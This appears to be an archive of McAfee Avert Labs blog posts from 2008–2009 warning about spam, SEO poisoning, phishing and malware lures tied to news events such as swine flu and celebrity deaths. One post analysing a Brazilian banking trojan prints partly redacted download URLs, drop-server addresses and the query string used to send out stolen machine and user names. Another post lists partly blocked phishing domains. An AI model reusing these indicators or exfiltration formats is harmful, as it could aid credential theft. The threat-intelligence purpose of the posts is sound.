The announcement of Michael Jackson’s death has caused immediate effects on the Web 2.0 world. The impact ranged from the interruption on Facebook of coverage of Farrah Fawcett’s death to a surge experienced by Twitter. The Web 2.0 world is definitely abuzz with traffic regarding his passing.

Within hours the percentage of “long-tail” URL traffic associated with Michael Jackson was growing. It peaked around 1 p.m. Eastern time today and now seems to be dropping. These URLs contained mostly generic information about Jackson–blogs, posts, tributes, photos, and collections of his entertainment past. And, yes, some even contained links to malware or rogue anti-virus software.

How do people find these URLs? We’ve seen spam, tweets, blog postings, group postings, and even mobile phone alerts. In addition, as predicted by Avert Labs, we’ve seen search-engine optimization (SEO) in action. There were several attempts to capitalize on redirecting users to known malware-serving sites associated with other SEO campaigns. We found it interesting during our research to see how fast some of the search engines seemed to respond to this. One popular keyword search done around 9 p.m. yesterday showed seven of the top 10 links going to some of these well-known malicious servers. That same search done an hour later showed only one of the top 10 involved.

As the entertainment industry continues to pay tribute and homage to Jackson, we expect that spam and SEO efforts will grow over the weekend. Eventually a new piece of news will replace this event, and there will be a new story–with much the same results.

With the current news about the deaths of Farrah Fawcett and Michael Jackson, it’s a good idea to remind our readers to beware of blackhat attempts to distribute malware to anyone looking for news.

Every time a disaster happens or news about some celebrity reaches the media, malware writers try to take advantage of it. The most common attack vector is email. Watch out for spam offering links to “news” or “pictures” of deceased celebrities. Most of the time, they will take you to websites offering advertisements for pharmacy products such as Viagra and Cialis or, even worse, will try to install malware on your machine!

But another way to attract visitors looking for news is a technique known as search engine optimization (SEO for short, see more here). Blackhats use SEO to inflate search engine results in an attempt to put their results on top of the list and drive more users to fake websites offering “more information” about the current trendy news. When the users click on the fake links, they are susceptible to any kind of attack, spyware or malware installation, or information theft.

A good way to protect against this kind of attack is to use our SiteAdvisor tool, which can be downloaded for free at this site: http://www.siteadvisor.com/. It will help you identify potentially malicious links on your search results.

And again, repeat with me: No, that email will NOT show you pictures of Michael Jackson’s body; it will just install malware on your machine.

With the advent of Web 2.0, social networking websites have become an easy target for online fraud and other identity scams. Lately, we have seen Twitter being used to phish out personal information, as well as MySpace scams and Facebook spams.

With more than 15 percent of the traffic from India, Orkut is perhaps the most popular and widely used social networking website in the country. Phishers have come up with an elegant approach to social-engineer the not so tech-savvy users on Orkut. They have updated the user profiles of several thousands of compromised Orkut accounts, which now link to various phished websites. These lure visiting users into divulging their personal information.

Various phished websites claim to be the “adult” variant of Orkut. The “Orkut Sex” site has been very successful in luring several thousands of Orkut users into entering their credentials into this fake website. The attackers use the harvested details to steal other personal information for monetary gain.

We have observed scores of websites being used in this phishing attack. Here are a few of them:

• http://orkutsexlogi[blocked].tk
• http://s3x[blocked].kilu.de
• http://orkutst[blocked].tk
• http://album[blocked].kilu.de
• http://priya[blocked].freehostia.com

If you have read this far, I probably don’t need to remind you to look carefully before you enter your personal details on the web. Always make sure that you are safe and protected–and keep away from the rip-offs.

As we foresaw, spammers have used the Air France AF447 disaster to catch people’s attention and prompt them to open fake news emails related to this event. Less than two weeks after the crash, the firsts emails started to spread. We’ve seen the following subjects:

• A-330 blackbox record
• Another plane crushed
• Last seconds of plane

When opened, all these emails display advertisements promoting Canadian pharmacy products such as Viagra and Cialis.

Two days ago, we saw several million spam messages with these subjects. Today this number is only half as big.

As usual, these spammers are disrespectful and do not hesitate to use the most shocking events to promote their shady businesses.

I thank my colleague Adam Wosotowsky for his invaluable assistance with this post.

Today we at McAfee Avert Labs released an excellent paper on browser attacks. Written by Christoph Alme, this paper deals with the many complexities of browser security and attacks. From the paper:

Web Browsers: An Emerging Platform Under Attack
“The widespread use of highly interactive “rich client” web applications for e-commerce, business networking, and online collaboration has finally catapulted web browsers from straightforward HTML viewers to a full-blown software platform. And as corporate users are performing a significant portion of their work on the web, whether it’s researching or collaborating, the safety of the underlying platform is critical to the company’s success. ”

Other areas the paper covers include:

• The shift in spam to mainly malicious web link usage

• “Web 2.0” sites—whether weblogs, social networking or portal sites—are increasingly spammed with links to malicious sites

• Legitimate sites are compromised and misused to either host malicious code or link to a malicious website

• Use of malicious video banners placed in advertisement networks

• Use of popular search terms to advertise and drive (search query) traffic to a malicious website. In a recent case in Germany, attackers used Google AdWords to attract users who searched for “flash player” to the attacker’s fake Adobe-look-alike site

Download the paper in its entirety here.

Today we released our Spam Report for the month of June. In it we discuss two key findings:

President Obama’s First 100 Days of Spam
Although you might imagine the change of administration in the United States would have a major impact on the Internet, the first 100 days of Obama’s presidency were mostly business as usual in the spam world.

Identifying Spam Trends of the Future
Even though we’ve been told to avoid clicking such links to prevent spammers from learning who we are, many of us forget to be vigilant because the overall detection accuracy of anti-spam products has improved. Recipients may instantly distrust an executable attached to an email, but they often feel unthreatened by a short blurb and a URL.

What does the future of spam hold for us? Spam is all about making money and, as with most businesses, spammer CEOs need to worry about costs and their bottom lines. As long we continue to behave as suckers, spammers will use sophisticated tactics to separate us from our money. Download the full report here.

Today we launched a new web film series, entitled “H*Commerce: The Business of Hacking You.” The film series was created to expose cybercrime as a serious and universal threat that can no longer be ignored. Several of our own Avert Labs researchers lent a hand and their big ol’ brains to the project!

The term H*Commerce (or Hacker Commerce) is defined as the business of making money through the illegal use of technology to compromise personal and business data. Starting today, a new episode will be posted every two weeks here until all six episodes have aired.

The project was originally conceived as a series of standalone episodes, each focusing on different aspects of cybercrime: such as phishing, denial-of-service attacks, online scams, bank scraping, and fraudulent emails. As the filmmakers dug deep into the experience of H*Commerce victims, they realized the film’s focus had to be on the complex stories of real people doing normal online things, only to be horribly violated by ruthless cybercriminals.

Seth Gordon, director of films such as the 2008 theatrical release of “Four Christmases,” and the documentary “The King of Kong–A Fistful of Quarters,” was hired to direct “H*Commerce: The Business of Hacking You.” As Gordon began the research phase of the film, he identified an Oregon woman named Janella Spears, who was a victim of one of the largest and most elaborate email scams on record.

Spears’ story of losing more than $440,000, and the dire effects it had on her family and marriage, became the central theme of the film series. Over the course of the filming, Chris Roberts, a third-party cyberforensic expert, was introduced to Ms. Spears to provide advice on how to clean her system, handle the hackers, and help put an end to the cybercrime scams.

Watch, learn, and arm yourself with knowledge. Check it out at Stop H*Commerce.

Today McAfee Avert Labs released its Threats Report for the first quarter of 2009. In it we reveal that cybercriminals have taken control of almost 12 million new IP addresses since January, a 50 percent increase since 2008. The United States is now home to the largest percentage of botnet-infected computers, currently hosting 18 percent of all zombie machines. Seems the bad guys are attempting to recover from last November’s takedown of a central spam-hosting ISP by rebuilding their army.

Other Key Findings

The Koobface virus has made a resurgence, and more than 800 new variants of the virus were discovered in March alone.

Servers hosting legitimate content have increased in popularity with malware writers as a means for distributing malicious and illegal content.

Cybercriminals are increasing their use of URL redirects and Web 2.0 sites to disguise their locations.

Compared with the overall landscape, the Conficker worm represents a small subset of all threat reports. AutoRun malware, on the other hand, represented 10 percent of reported detections during the first quarter–quite a bit more than Conficker itself.

You can find the full text of the “McAfee Threats Report: First Quarter 2009″ here.

We have been getting quite a few requests for screenshots of swine flu spams as well as the e-pharmacy sites they link to. Your wish is our command. …

The image below is a collection of a bunch of swine flu spams:

You may notice several things here. First they are mainly text and links. Next, they use some good keywords: Obama, Gore, Madonna, Salma Hayek, and swine flu itself. Notice the linkage? They all seem to point to the .cn domain. Yes, .cn is China, but they are all redirects. When I looked at the Internic registry info it was a round-robin of Chinese and Russian domains and NS records.

Here is a screenshot of the e-pharmacy they all lead to:

You guessed it. It’s our old friend the “Canadian” e-pharmacy. Very clean and professional looking indeed; make sure you avoid these.

As we have pointed out for the last several days, these people are bottom feeders. My colleague Guilherme Venere quite clearly showed in his recent post that they are now linking directly to malware as well, so it is important to stay updated and educated.

Remember, if you need credible information on swine flu, go directly to the World Health Organization’s website. And if you need meds–maybe a ride to the doctor would be safer.

It’s been just a few days since we started talking about spam using Swine Flu as a way to catch user’s attention to sell pills. This time, however, the message is not very “healthy”:

The message above is in Portuguese, and goes like this: “For those who still don’t know, the pictures below show the Swine Flu terminal stage, the experts are trying to calm people down, but the pictures show that calm down is the only thing we shouldn’t do. See how the patient becomes in advanced stage”.

As we saw yesterday on David’s post, Brazil is the number one source of spam related to Swine Flu. In this case, the spammers use the name and logo of the biggest TV network in Brazil, Rede Globo, to catch user’s attention. But remember, this is a spam; they use this to make users believe that the news is true.

Links lead to two different malware files:

http://cch.[removed].dk/images/thumb/xxx/alerta.php?atencao=visualizar

=> Foto.29.04.2009.com

http://[removed].ru./uploaded/alerta.php?atencao=ver

=> Foto.29.04.2009.jpg.exe

They are identified as PWS-Banker-dldr and PWS-banker-gen.g

The file Foto.29.04.2009.com is a downloader which drop the URL below as C:\WINDOWS\temp\configura.exe

http://201.xx.xxx.xxx/manual/programs/ht/ht/zu/zu/abrir/Pcrazy.gif

And this file is identified as PWS-Banker-gen.b

This is a common banker malware which overlays a fake image over real the banking site. Here’s an example of a sequence telling the user his account will be suspended if he doesn’t update his information with the bank, then asking him to enter their personal information and even his credit card data: 

The information about the hacked machine and banking data are then posted to the sites below:

hxxp://[removed-1].100webspace.net/post.php

hxxp://[removed-2].100webspace.net/post.php

hxxp://[removed-3].100webspace.net/post.php

hxxp://[removed-4].100webspace.net/post.php

This is the strings appended to the URLs above:

tipo=inf&tip=[machinename]+[username]&inf=INFECTADO%0D%0A&

But one image inside this malware called our attention. The image below tries to disguise itself as the website for the Brazilian National Security Agency (SENASP), a site used by Brazilian law enforcement agents to research information about Brazilian citizens:

They attempt to steal usernames and passwords for this site. If the miscreants get access to this site they would be able to get information about any Brazilian citizen they want, even the president. Now tell me about identity theft!

As we can see an apparently innocent e-mail could cause your banking information to be stolen and even have more serious implications as the case above.

Following up on Chris Barton’s excellent blog the other day on swine flu spam, we wanted to take a closer look at the numbers…..

Many people may not realize that the words “swine” and “flu” had really not been seen in spam before this past weekend and almost certainly not together in the same subject line, so we kinda started there. Using our Trusted Source technology and intel I was able to pull the following chart on the sheer growth in the words “swine” and “flu” when used just as a subject for the last several days:

Bear in mind that is NOT daily volume growth but rather the growth in its use as a subject.

From the beginning of the campaigns we have seen it generated from all over the world, not really a surprise when one considers the global nature of botnets and spam anyway but the country breakdown is interesting to look at. Seems that Brazil, the United States and Germany are the biggest producers/sources at the moment:

No safe country from spammers eh? When you consider that on any given day there is between 80 to 170 billion email messages with 78 to 90 percent of that number being spam, sending with the subject of “swine flu” gives these criminals a high chance of success due to the media attention the subject is already getting. Social engineering is one of the most successful and dangerous tools at the spammers disposal and it is very hard to protect against.

We have also seen sites with the words “swine” and “flu” pushing malware as well. In this case its a redirect to a Russian-based site that requires our old friend the fake codec be installed to view the movie:

Malware writers, spammers and scammers are low lives. They will use any high media event or high impact news story to push their wares including the sickness and misery of others. Stay vigilant and stay safe. Should you need credible information on the influenza pandemic then go to The World Health Organization website.

The Swine Flu pill spam has started and it’s taking a few Hollywood stars names in vain. Nothing out of the ordinary with the sites on the far end yet though I do expect Oseltamivir [AKA Tamiflu] will get some extra exposure once the affiliate pill sites are updated.

Subjects:

First US swine flu victims!
US swine flu statistics
Salma Hayek caught swine flu!
Swine flu worldwide!
Swine flu in Hollywood!
Swine flu in USA
Madonna caught swine flu!

Also we’ve noticed domain name registrations mentioning the word swine are up by about 30 times and you can bet your daughters it’s not all going to be “whitehat” SEO.

Today McAfee has released The Carbon Footprint of Email Spam Report. The study looks at the global energy expended to create, store, view, and filter spam across 11 countries: Australia, Brazil, Canada, China, France, Germany, India, Mexico, Spain, the United States, and the United Kingdom. The report correlates the electricity spent on spam with its carbon footprint, because fossil fuels are by far the largest source of electricity in the world today. Since emissions cannot be isolated to one country, the study averages its findings to arrive at the global impact. Key findings include:

• The average greenhouse gas (GHG) emission associated with a single spam message is 0.3 grams of CO2. That’s like driving three feet (one meter); but when multiplied by the yearly volume of spam, that amount is equivalent to driving around the earth 1.6 million times.
• Much of the energy consumption associated with spam (nearly 80 percent) comes from users deleting spam and searching for legitimate email (false-positives). Spam filtering accounts for just 16 percent of spam-related energy use.
• Spam filtering saves 135 terawatt hours (TWh) of electricity per year. That is equivalent to taking 13 million cars off the road.
• If every inbox were protected by a state-of-the-art spam filter, organizations and individuals could reduce today’s spam energy by 75 percent or 25 TWh per year, the equivalent of taking 2.3 million cars off the road.
• Countries with greater Internet connectivity and more users, such as the United States and India, tend to have proportionately higher emissions per email user. The United States, for example, had emissions that were 38 times that of Spain.
• While Canada, China, Brazil, India, the United States and the United Kingdom showed similar energy use for spam by country, Australia, Germany, France, Mexico, and Spain came in about 10 percent lower. Spain had the lowest figure, with both the smallest amount of email that was received as spam and the smallest amount of energy use for spam per email user.

Not only is spam related to cybercrime and a nuisance, but it also impacts the environment. Download the study here. It’s worth a read.

Have you ever read an article on the web where you just had to Google a certain term or phrase to learn more about it, or even just to satisfy your own curiosity? The answer is likely yes, and it’s probably a frequent occurrence. That’s what malware distributers have figured out. Here’s an example. A news article about disgraced financier Bernard Madoff made mention of his 55-foot yacht; a 1969 Rybovich. Wow, I bet that’s a spectacular yacht. If you wonder what one looks like, perhaps you might do a quick search for “1969 Rybovich.” One may think such a casual search would be harmless. Think again. It turns out Malware distributors have honed in on the yacht phrase and the top Google results are malicious URLs. We first noticed this on the evening of April 1 when we first read the story and were curious - and our first take was “Wow, they are fast”.    We watched the evolution of the number of google results that presented malware over the course of April 2. The last we checked - even one of the blogs off of my.barackobama.com was utilizing this yacht to lure users.

The search results don’t look so threatening, but if you are to click on the first few URLs, you’ll find differently. Each of these URLs is a rouge anti-virus URL that will distribute malware. Here are a couple of examples…

These two examples should arouse suspicion by now, especially if you’re looking for yachts, but anyone acting in haste, or succumbing to further curiosity will be taken to the malware delivery upon clicking where prompted, and frequently it’s already been delivered even if you don’t click.

This example is quite typical of what you’ll see next when you click, a fake malware scan that delivers the malicious goods. It looks just like an MS scanner!!!

So what about that 1969 Rybovich? What about further curiosity based Googling? Next time you find yourself conducting such a search, do so with caution. Consider if the search result URLs all look similar. In this case, that is first red flag of caution. When you click to go to a link; does the content look like what you expected or is there some unexpected prompt to click? This is red flag number two. One shouldn’t even proceed onto red flag number three to see the fake malware scan. Already you’re taking a dangerous path that is not going to show you anything about Madoff’s yacht.

McAfee Avert Labs will now produce more detailed documentation on prevalent threat families. The “Combating Threats” document series is designed to arm security staff within organizations with more information concerning prevalent threat families as well as to provide additional mitigation steps that can be taken. The first two documents in this series, “W32/Virut Family” and “Finding W32/Conficker.worm,” are now available via our blog, prior to our “Combating Threats” web page going live.

UPDATE MARCH 17th

Apologies for the busted links yesterday. All seem to be resolving fine now.

Users should always take care while surfing the Internet and reading mail, and today maybe more than usual: Another spam run from the Waledac botnet is on the loose, this time misusing the good reputation of the news agency Reuters. After the “President Inauguration,” “Valentine Scam,” and the “Economic Crisis,” this time the social-engineering trick is a “Terror Attack” in your city. Mails with subjects such as “Why did they explode bomb there?” or “Why did it happen in your city?” are being sent out by the botnet right now.

Again the bad guys are using geolocation services to better target their audience. As described in my earlier blog, they are using the city name of the user visiting the fake website and inserting this name into the website itself. So the “breaking news” gets even more attention, because when an attack happens in your home town, everyone would be anxious and curious, right? The screenshot below is an example what a user from New York would see; other users would see the same message but with their local city being “attacked”:

The website claims that a “dirty bomb” exploded in the user’s city and that at least 12 people have been killed. A video from Reuters is presented but “You need the latest Flash player to view video content. Click here to download.” It’s another example of the time-worn missing-codec trick. The needed “update” named main.exe or save.exe is in fact the real malware.

The fast-fluxing website also includes a malicious IFRAME that refers to malicious code trying to exploit unpatched computers with an additional drive-by infection.

The Waledac/Storm authors try to keep their botnet running and always craft new social-engineering tricks to fool unsuspicious users to follow their lure. As always, the best advice is to not click links in spam mails. And the malicious IFRAME pointing to a drive-by infection is another good reminder that “curiosity killed the cat.”

Last week I blogged about how the community forum of Democrats.org was being abused to help manipulate Google’s search results; to lead people to malware.  It appeared that by the end of last week, Democrats.org began the cleanup process of removing all the bogus posts, which seems to have been completed as of this time.  Google’s cache shows that other popular sites were hit as well, including my.barackobama.com and Microsoft’s silverlight.net, which were cleaned up sometime before the end of last week.

In looking a little more at the spammed phrases, it appears as though there are likely multiple groups behind these attacks, perhaps with different agendas.   Some of this is obvious from the formatting of the spam.  The terms themselves also vary, some appear in more dictionary style, while others are more focused on current events, and others still are rather uncommon.  The uncommon terms (including typos) lead me to speculate that at least some terms originated from compromised systems.  There may be a circular nature to this, where unsuspecting victims become infected with one piece of malware, only to have their search terms harvested, analyzed, and subsequently used to entice other victims, but again this is speculation at this point.

The other day I blogged about Google Trends being abused to serve malware.  The attackers were not only targeting the most popular search terms, but also manipulating Google’s page rankings to appear high up on search results.   Shortly thereafter it appeared that Google took action against that attack.  In deed a Google spokesperson confirmed that idea.

Today, Brian Krebs blogged on a separate story, but mentioned that while searching for a related term (pifts.exe), Google returned a poisoned link high on the results list.  After doing a little searching I discovered that the relevant term did seem to appear on Google’s top 100 search terms for a brief period.  However, the other terms I checked on Google Trends did not yield high ranked poisoned links as before.  But, I did come across a potential source for the page rank manipulation aspects of these attacks;  www.democrats.org, which is “Paid for by the Democratic National Committee “, and linked to from www.barackobama.com.

It turns out that this high-ranking website has a community blog feature that allows anyone to create a blog and post whatever they want.  Attackers have flooded this forum with bogus posts and thousands of links for more than a month.

Blog spam such as this is not anything new.  However, this highlights one significant effect of such spam and underlines the cause and effect relationship of security on the web.

Web searches are immensely useful and quite powerful.
Web 2.0, where a community of users contributes content for the betterment of the community can be a great thing.
But combined, a bad apple (or thousands) doesn’t just hurt the community; it can hurt a significant portion of the Web itself.

The third edition of our monthly spam report was released today. This edition discusses some fascinating topics. Key findings include:

Spam campaigns are taking advantage of “partitioning” to increase their effectiveness and combat the efforts of security tools to reduce their reach.

Replica-watch spam has taken over the number one position for holiday spam.

Business leaders and legislatures have promised to stamp out spam, yet the plague persists. Does reputation-based security hold the key?

Putting a dollar value on productivity lost due to spam.

The topic of lost productivity and bringing quantifiable numbers to the impact of spam on a business is particularly interesting and worth a solid read. Download a copy here.

A new spam run is on the loose, misusing the global economic crisis as its social-engineering vector. Consumers looking for a bargain should take care, because the bad guys exactly want to fool people trying to save some money these days. Spam mails promoting bargains, which could help in the recession, are hitting the inboxes right now.

When users follow a link in such spam mails–but please don’t do that!–a website like the one below appears:

After the Valentine’s Day theme, the malware authors behind the Waledac botnet changed their lure to promote free coupons, pretending to “save” consumers a lot of money. The text states: Exclusive sale coupons and deals at over 100 000 stores in <City>, <Country>. You can find these amazing sale offers and coupons ONLY HERE! You can download free online and printable coupon list. In our list there are most popular stores, restaurants and companies in <City>, <Country> with discounts up to 95%. We help you to survive this crisis! The coupon list is named “couponslist.exe,” “sale.exe,” or “print.exe”–and, in fact, is malware.

In economically hard times, the malware authors do not rely only on clever and timely social engineering, they also include a malicious IFRAME in the website that refers to malicious code trying to exploit unpatched computers with an additional drive-by infection. Furthermore, the website is craftily designed. The bad guys are using geo-location services to better target their audience. So when someone connects to the website, it determines the geographical location on the fly and presents the actual location in the website texts. When a victim sees coupons for exactly his town, this will increase the demand for the bargain list.

As a last piece of advice we can only stress again that consumers should always take care with offers that look too good to be true–even more so in the hard times of a global economic crisis. Please also refer to our predictions for 2009 “Cybercrime, Online Threats, and the Recession.”

As the recession continues and unemployment rises, we foresee the top cybercrime trend for 2009 as the continued exploitation of the financial crisis to scam people with fake financial transactions services, bogus investment firms, and fraudulent legal services.

A related trend will be cybercriminals targeting people looking to advance or change their careers through further education. McAfee® Avert® Labs researchers have seen major spikes in diploma and advanced-schooling scams that have coincided with major corporate workforce reductions in the car manufacturing, chemical, and technology industries.

Our Main Threat Predictions/Trends for 2009:

• Threats on Social-Networking Sites. Cybercriminals no longer deliver threats only via spam. They are taking advantage of Facebook, MySpace, and other popular social-networking sites. McAfee expects this trend to continue throughout 2009, eventually displacing more traditional ways of malware distribution such as email.

• Personalized Threats Speak Your Language. McAfee expects to see the continued expansion of malware in languages other than English. Cybercriminals have come to realize that by diversifying into a global market they can access even larger pools of valuable identity and confidential information.

• Malware Targets Consumer Devices. McAfee expects increased attacks involving USB sticks and flash-memory devices used in cameras, picture frames, and other consumer electronics. This trend will continue due to the almost unregulated use of flash storage across enterprise environments as well as their popularity among consumers.

• Security Software Scams. The malware underworld is using mainstream practices in an effort to “sell” security software that is either misleading or outright fraudulent. McAfee expects this trend to continue.

• Abusing Free Web-Hosting/Blogging Services. Websites such as Geocities, Blogspot, and Live.com allow anyone to create a public website for free, without the authentication necessary when purchasing a domain-name website. This gives spammers the opportunity to run their underground business with minimal expense. Spam from do-it-yourself social-website-hosting providers arrives at its destination with far greater frequency than links pointing to domain names assigned by legitimate registrars. With little to no threat of punishment for their hosted content, and the new restrictions on short-term domain tasting, the attractiveness of free bandwidth offered by these sites will undoubtedly draw greater focus from malicious parties.

• More Targeted Phishing and Corporate Blackmailing. Botnets, a.k.a. zombie computers, that spread into corporate networks and financial datacenters will increasingly be used to gather sensitive information that can be used for blackmail or sold on the underground market.

• Browser-Based Attacks. Cybercriminals will increasingly attack via web browsers as they are the least-protected and, therefore, easiest way to transfer malware.

• Security Breaches of Confidential Data. Information that is managed by partner and subsidiary companies of bigger companies will be exposed more frequently, forcing an overhaul of data-security practices.

• An Increase in Localized Phishing Campaigns. Online scammers will increasingly target specific communities, especially on college campuses, where professional-looking emails claiming to be associated with the school’s financial or scholarship department will be blasted to all the students at the school. This is a significant danger to people who are just becoming responsible for their own finances.

• More Scams Involving Home Businesses. “Legitimate” home business scams generally involve either a pay-up-front and do-it-yourself kit, or a pay-to-play shell game of training and certification. We’ll see more of it on television, and the same infrastructure that supports diploma spam and confidence fraud will adjust to the new unemployment reality and will offer people some new bait on the old check-cashing scam.

• Increase in Forging and Abuse of Free Email Services. The free email services have started to allow accounts to send mails with arbitrary “from” addresses. This has increased the usability of these services significantly to businesses, but has also increased the “abusability” by spammers.

• McColo: The Effects of a Takedown. Spam traffic took a tremendous dive in volume when ISPs pulled the plug on spam host McColo Corp., the source of up to 60 percent of worldwide spam. In 2009, we expect to see a continued shift in organizations, from passive support of law enforcement to an active role of working collaboratively with ISPs and global Internet entities such as ICANN.

• New Businesses to Replace Lost McColo Hosting. Hosting companies will be set up in countries that are eager to embrace a burgeoning Internet market and will offer services to replace the disrupted command and control centers formerly hosted by McColo. These may be used as pawns by entities that perceive strategic value in sculpting the battlefield of the future.

In conclusion, McAfee recommends that you keep your security software up to date, implement layered defenses, and educate yourself on the trends of the day. Download our February Spam Report and 2009 Threat Predictions to read further and in more depth on these trends and issues. Remember: The cybercriminals read the same news that we do.

As the tradition of Valentine’s Day approaches, so does another tradition: Valentine’s Day-themed spam that leads to malware. At McAfee Avert Labs we think everyone by now should know not to click on unlikely links to “love letters” and similar attractions. But we go on doing so. I guess love really does make us blind.  

By looking at the number of times we see the word valentine in spam, we can see how the spammers pump up the volume in the run-up to February 14. The following graph shows results for the month of January.

The current wave of Valentine’s Day spam contains links to domains that carry the Waledac Trojan. We are currently monitoring about 100 of these infected domains. Each of the domains is fast-fluxed, so there are hundreds of nameservers and thousands of IP addresses involved. (For more on Waledac, see the recent post from my colleague François Paget.)

Many of the Waledac techniques and features are very similar to those of the well-known Nuwar/Storm Trojan. At this time last year Nuwar was pumping out Valentine’s spam that looked like this:

And today Waledac spam looks like this:

Subjects such as “Deeply in love with you,” “I Knew I Loved You,” and “I Love Being In Love With You,” followed by a short URL in the body are typical of these attempts, which point to sites that offer a little Valentine’s malware. By all means send love notes to your honey before and on Valentine’s Day, but don’t fall for these transparent, annual attempts that lead only to tears.   

(Thanks to my colleagues Kevin McGhee and Dmitry Gryaznov for their contributions.)

China’s use of zombies for spam is down, but the country now leads the United States in McAfee’s February Spam Report, available here for download.

The United States has long been the leading supplier of spam, but with the overall amount of spam decreasing, China is catching up. It’s not clear what China is doing, but the vast amount of computers that have been controlled by zombies are no longer being used for that purpose. One certainly has to wonder what they are being used for.

Additionally, in Switzerland (owner of the .ch domain), we have seen a big increase in the amount of spam offering “cheap” software.

Clearly, money and profit are still the driving forces for malware and spam these days.

For those who think the holidays always start too early, guess what? It is time to get your Valentine’s on. Well, at least spammers think so. Avert Labs started seeing Valentine enticing spam on January 22, and it has been increasing steadily since. Currently we are tracking Valentine’s spam to be between 1 percent and 2 percent of the total email sent on a daily basis.

Typical subjects we are seeing include “Deeply in love with you,” “I knew I loved you,” and “I love being with you.” A sample email of the “Only you in my heart” spam is shown below.

Once the reader opens the email a URL is available to click on. It’s not surprising that the URL points to a site that contains malware. The display seen below entices the viewer to click on one of the hearts. The binary file meandyou.exe is downloaded if a heart is selected.

Spurred on by this new outbreak of Valentine’s spam, overall spam volumes continue to climb back to pre-McColo takedown levels. Spam in January of this year is within 10 percent of spam from last January, and within the last few days spam is within 20 percent of pre-takedown levels. Spam reached record highs last March and with spammers getting back online and the lure of love in the air, it may be a just matter of time until new record levels are set.

Late last year, my sister forwarded to me an email that foretold of great evil and destruction should anyone open an email with a “Happy New Year” greeting for a subject. The email begged us to save the world by forwarding it to everyone we know. She wanted to know if she should believe it.

More recently I got something similar, this one warning that a deadly email will have a subject concerning President Barack Obama’s acceptance speech. This one added an air of authenticity by claiming that a popular hoax-tracking site has verified the details to be true. Hoax or not, I rarely read past the subject line of these types of emails, and I never forward them to others. Here are my reasons why:

• Thousands of mass-mailing worms have been discovered, and new ones are found every day. Each one carries multiple variants of the email it sends out. I would never remember every subject and message that I need to avoid.
• Verifying the veracity of a virus warning doesn’t do you any good. Say you have an email that warns you not to open an attachment if the subject is “blahblah”, and the attachment name is “blah.exe.” Then everyone declares this email a hoax, not real, nothing to worry about. Does that mean if you do receive an email that matches the description of the “hoax,” that it’s safe to open? Of course not! This is exactly what happened with the AOL4FREE hoax. It started out as a hoax, then someone had the bright idea of using the information from that hoax to send out a real Trojan horse.
• There’s already too much spam going around. 
• Security is a lucrative business, and players in this industry are just as publicity-hungry as any. If a virus was a real and significant threat, you’ll find your friendly neighborhood security expert in every media outlet talking about it. So just watch or read the news.
• Every holiday or significant world event is inevitably followed by emails containing a message about that event and carrying a nasty payload. Everyone should learn to expect this already. It’s called social engineering.
• Rather than reading through all the virus warnings, it’s easier and much more effective to to keep in mind a fixed list of simple tips.

Valentine’s day is coming up. You don’t need a friend of a friend to warn you that pretty soon you’ll be getting a suspicious email love letter.

Today, we at McAfee Avert Labs released our 2009 Threat Predictions. Amongst the findings are:

Threats Hide in the Cloud
Miscreants have also transitioned to the Internet “cloud” as their main delivery vehicle and take advantage of the attractions of Web 2.0. McAfee expects this trend to continue throughout 2009, eventually displacing more traditional vectors of malware distribution.

Personalized Threats Speak Your Language
Threats will continue to take evasive action against security measures. One example is the existence of single-use binary files, which are an attacker’s equivalent of a single-use credit card number used by consumers when shopping online. These binaries help to create a vast sea of threats, which will make it harder for victims to describe their assailants, and make it harder for defenders to catch them. Additionally, McAfee expects to see the continued expansion of malware in languages other than English. Cybercriminals have come to realize that by diversifying into a global market they can access even larger pools of valuable identity and confidential information.

Malware Targets Consumer Devices
McAfee expects increased attacks involving USB sticks and flash-memory devices used in cameras, picture frames, and other consumer electronics. This trend will continue due to the almost unregulated use of flash storage across enterprise environments as well as their popularity among consumers.

The Rogue Web and Malvertising
Last year McAfee also saw the malware underground use mainstream practices in an effort to “sell” software that was either misleading or outright fraudulent. McAfee expects this trend to continue as cybercriminals still see a lucrative market in this area.

McColo: The Effects of a Takedown
Spam traffic took a tremendous dive in volume when ISPs pulled the plug on spam host McColo Corp., the source of up to 60 percent of worldwide spam. In 2009, we will see a continued shift in organizations, from passive support of law enforcement to an active role of working collaboratively with ISPs and global Internet entities such as ICANN. Together, these organizations will shine the public light on these malicious actors and shut down their access to network and systems infrastructure.

Download the full report from our whitepaper page here.

In less than four days the inauguration of President-Elect Barack Obama will make headlines. At McAfee, we expect cybercriminals to use this event to conduct their typical attacks like they do when the news gives them such opportunity.

Unfortunately, we were right and some sites have already started to circulate fake information on this subject to lure in the crowds in an attempt to infect their computers. Here is one of them we recently discovered. As you can see for yourself this author does not hesitate to make use of sensationalism:

Let me add that if you are lured into this trap and are using an incorrectly protected PC that you will be infected by malware we detect as W32/Waledac.gen.b.

This website was not created by a joker. It is very professionally done. It is protected by a botnet bringing into play the fast-flux technique I have explained here and here.

Once again, be vigilant and do not unwisely follow a link you may have received via email or find upon a search!

Today we at McAfee Avert Labs released the first of our new monthly publications: the “McAfee January Spam Report.”

Within its pages you will find excellent information on current spam trends, campaigns, and maybe even some “winners and losers.” Some of the highlights of the January issue include:

Political Spam
Tax Relief Junk Mail
Unemployment and Diploma Spam Increases
Christmas E-Cards

As well as some 2009 spam predictions! Definitely worth the download and read. Watch for our February issue in about four weeks. All spam reports, as well as other white papers, are available from our whitepaper download area here.

Google’s code-hosting project is the latest free service to be abused by web spammers. We’ve seen one or two previously, but over the holidays the situation appears to have got much worse. They are creating lots of new projects with the following type of website on:

Clicking the image will take you to today’s fake codec download site. Repeated clicks will take you to an adult site [both NSFW, you have been warned!].

The difference between this and the MSN Spaces abuse that is now about a year old is that Google appears to automatically index code projects, so any Google-Jedi can generate a good list (Google Search–again, don’t click the links) to start with.

Or the fact that the image is linked from http://bestsextube dot net/video.gif all the time might also be useful to know. The icing on the cake, though, is the link to somewhere/in.cgi … I’ll come back to this later.

The porntube site is also host to a number of other related sites such as fake anti-anything software:

The codec download site, which is in Latvia, also hosts a number of related sites:

The Google Code project owner has a few other projects of a similar nature, too.

A year ago I blogged about MSN Spaces beta with a very similar issue… I even spoke to some very nice folks there about it, and a year later it’s still being abused by spammers [ spamhaus award. ] I trust Google would like to appear less evil and will take more decisive action. I’d suggest mashing code and safe browsing together, but it appears not to find anything wrong with the clickable links, though it did catch on after some redirection took place.

…perhaps I should start consulting on this sort of thing

Anybody suffering deja-vous? “/in.cgi should ring an alarm bell or two. If not, check out my colleague Micha’s blog on traffic management. He explains what happens to those clicks! This is campaign “6.”

Happy new year to all!

